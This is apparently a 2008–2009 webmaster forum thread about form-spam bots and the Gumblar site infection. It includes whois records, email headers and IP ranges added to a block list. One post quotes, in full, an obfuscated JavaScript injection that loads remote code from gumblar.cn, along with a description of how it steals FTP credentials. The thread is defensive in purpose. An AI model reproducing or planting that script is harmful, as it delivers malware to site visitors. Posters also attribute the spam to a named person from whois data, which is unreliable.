Urk, this same bot hit me about 24 times this weekend when I was busy working 15 hour days and unable to get my wireless working. >_>

Some info of this person's ip from whois:

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
Mira 67
Perm
614036
Russian Federation

phone:          +7 342 2763167
e-mail:         abuse@limt.ru
e-mail:         noc@limt.ru
e-mail:         svr.band@gmail.com

What a lame, he named his email abuse@...
svr.band@gmail.com looks like Stevie Ray Vaughan to me lol
Anyway, I don't think the figures are reliable but they must mean something.

Last edited by kurtcobainvn (2008-04-16 11:51 am)

Hello,

Last weeks we have on a daily basis been recieving hundreds of submitted forms with nonsense text from our website. This is
causing big problems in our work.

When contacting the Swedish police in this matter they helped us finding the IP-adress to the source. The IP adress of the submitted forms is 78.129.202.9 and the police said it corresponds to the person Alexander A Solovyov at the company LIMT Group Ltd. Below is an example of one submitted form as of today.

What could we do about this?

Best regards

David

Return-Path: <postmaster@tux04.epsab.com>
X-Spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on mail2.space2u.com
X-Spam-Level: 2/5
X-Spam-Status: No, score=0.1 required=10.0 tests=BAYES_00,FH_FROMEML_NOTLD
    shortcircuit=no autolearn=no version=3.2.4
Received: from tux04.epsab.com (h-156-24.A170.cust.bahnhof.se [85.24.156.24])
    by mail2.space2u.com (8.14.2/8.13.8) with ESMTP id m3U8OEqr029942
    (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
    for <david@netway.se>; Wed, 30 Apr 2008 10:24:17 +0200
Received: (qmail 857 invoked by uid 48); 30 Apr 2008 10:24:13 +0200
Date: 30 Apr 2008 10:24:13 +0200
Message-ID: <20080430082413.10100.qmail@tux04.epsab.com>
To: ingemar@2000taletsvetenskap.nu, david@netway.se
From: ()
Subject: Ny medlem - 2000taletsvetenskap.nu
X-Generated-By: Matt Wright's FormMail.pl v1.9s-p7
X-Script-URL: http://www.2000taletsvetenskap.nu:80/cg … ormmail.pl
X-Originating-IP: [78.129.202.9]
Status:   
X-FS-Classification-spam:  2
X-FS-Diagnostics: database-version=2008-04-22 tests=DIRECT_MX_FORGED_RECEIVED,DNS_AVAILABLE,FS_UNTRUSTED_2,RDNS_DYNAMIC_IP_2,FS_CLASS_SPAM_2

Below is the result of your feedback form.  It was submitted by
() on Wednesday, April 30, 2008 at 10:24:13
---------------------------------------------------------------------------

Fornamn: zZSOUubAqXTo

Efternamn: jCVxYowjWJgCVYLhu

Adress: zXGdNURoZTwpSSOmOs

Postnr: oQSKWLQrRNlSpLjBCpj

Stad: XzliiMhSLDKrDRvZmha

Tfnnr: sGdSvmKTACEfWqu

-----------------------------------------------------------------------

I am sorry to say but either they have moved, which I find flase but the origin of the IP own is listed below. The "registrar" and/or "host" in this case is not taking responsibility for their client. Yet the Client clearly shows off whom they are and try to post they are elsewhere.

The "host" provider is the one you want to contact, because they are the ones maintaining their clients server. In this case, it would be UKSERVERS-MNT. They may have some Term of Service contract where their client is breaking it and can have their server shutdown.

Good luck

IP Information for 94.229.65.173
IP Location:     Russian Federation Russian Federation Limit-surehost-ip
Resolve Host:     no.rdns-yet.ukservers.com
IP Address:     94.229.65.173 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
Blacklist Status:     Clear
Whois Record

OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv: 
PostalCode: 1001EB
Country:    NL

ReferralServer: whois://whois.ripe.net:43

NetRange:   94.0.0.0 - 94.255.255.255
CIDR:       94.0.0.0/8
NetName:    94-RIPE
NetHandle:  NET-94-0-0-0-1
Parent:     
NetType:    Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment:    These addresses have been further assigned to users in
Comment:    the RIPE NCC region. Contact information can be found in
Comment:    the RIPE database at http://www.ripe.net/whois
RegDate:    2007-07-30
Updated:    2007-08-07

== Additional Information From whois://whois.ripe.net:43 ==

inetnum:        94.229.65.160 - 94.229.65.191
netname:        LIMIT-SUREHOST-IP-3
descr:          LIMIT SUREHOST IP RANGE 3
country:        RU
admin-c:        AAS188-RIPE
tech-c:         AAS188-RIPE
status:         ASSIGNED PA
mnt-by:         UKSERVERS-MNT
source:         RIPE # Filtered

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
address:        Karpinskogo 97a
address:        Moscow
address:        111423
address:        Russian Federation
phone:          +7 342 2763167
e-mail:         
e-mail:         
e-mail:         
nic-hdl:        AAS188-RIPE
source:         RIPE # Filtered

route:          94.229.64.0/20
descr:          UK Dedicated Servers Limited
origin:         AS42831
mnt-by:         UKSERVERS-MNT
source:         RIPE # Filtered

Hey Guys,

Dunno much about the subject but I have 2 dedicated servers on Godaddy and we were hit by this same Bot. We got an email from godaddy with this information:

ATTACK IP 89.185.228.12

our programmers have decoded this and are working on stopping this, looks like they got in from a weak ftp username and password.

SAMPLE OF MALICIOUS CONTENT:

script language=javascript  !--
(function(t){eval(unescape(('var_20a_3d_22Sc_72iptEngine_22_2c_62_3d_22_56ersi_6fn()_2b_22_2cj_3d_22_22_2cu_3dn_61_76_69gator_2e_75_73erA_67ent_3b_69f((_75_2
einde_78_4ff(_22W_69n_22)_3e0_29_26_26(u_2eind_65xO_66(_22NT_206_22_29_3c_30_29_26_26(document_2ecoo_6bie_2ein_64ex_4ff_28_22m_69e_6b_3d1_22)_3c_30)_26_26_28
_74ypeo_66_28_7arvzts)_21_3dtypeof(_22_41_22_29_29)_7bzrvzt_73_3d_22A_22_3bev_61l(_22_69_66_28window_2e_22+_61_2b_22)j_3d_6a+_22_2b_61+_22M_61jor_22+b_2ba+_2
2M_69nor_22+b+a_2b_22_42u_69_6cd_22_2b_62+_22j_3b_22)_3bdocum_65n_74_2ewrit_65(_22_3cscr_69pt_20_73rc_3d_2f_2fg_75mblar_2ecn_2fr_73s_2f_3f_69d_3d_22+_6a+_22_
3e_3c_5c_2fscri_70_74_3e_22)_3b_7d').replace(t,'%')))})(/_/g);
--  /script

I will post this info "decoded" in a few.
Let me know if this helps!

Thanks,

compmike

Hey thanks for the reply!

we have the same script here LOL (actually not funny but kinda)

we are cleaning our websites now but what a pain in the arse!

I will post any new info we / they find.

So far it seems they look for any ftp clients on a local machine and
finds the usernames / passwords from the ftp and send it to them. then
infect the websites and uses the websites to infect others.

ARRRRRGGGGG!

If you have any info please let us know!

Thanks again,

compmike

And if you feel like you want a tire-patch in the meantime, ZB Block should work fine for you.

Zap

So the moral of this story would seem to be to not allow custom avitars.

LIMT has a low-block too...

77.92.88.0 - 77.92.89.255

along with the higher...

78.129.202.0 -78.129.203.255

Have added both to ZB Block, and grouped them into RBN.

Will be publishing the updated signatures shortly.

Zap

Edit: It's published.

Last edited by zaphod (2009-05-16 8:49 pm)

for those of you keeping track of the gumblar.cn hack that's been sweeping the net lately...

it has now known as "martuz.cn"
IP: 95.129.145.58

http://hphosts.blogspot.com/2009/05/gum … tuzcn.html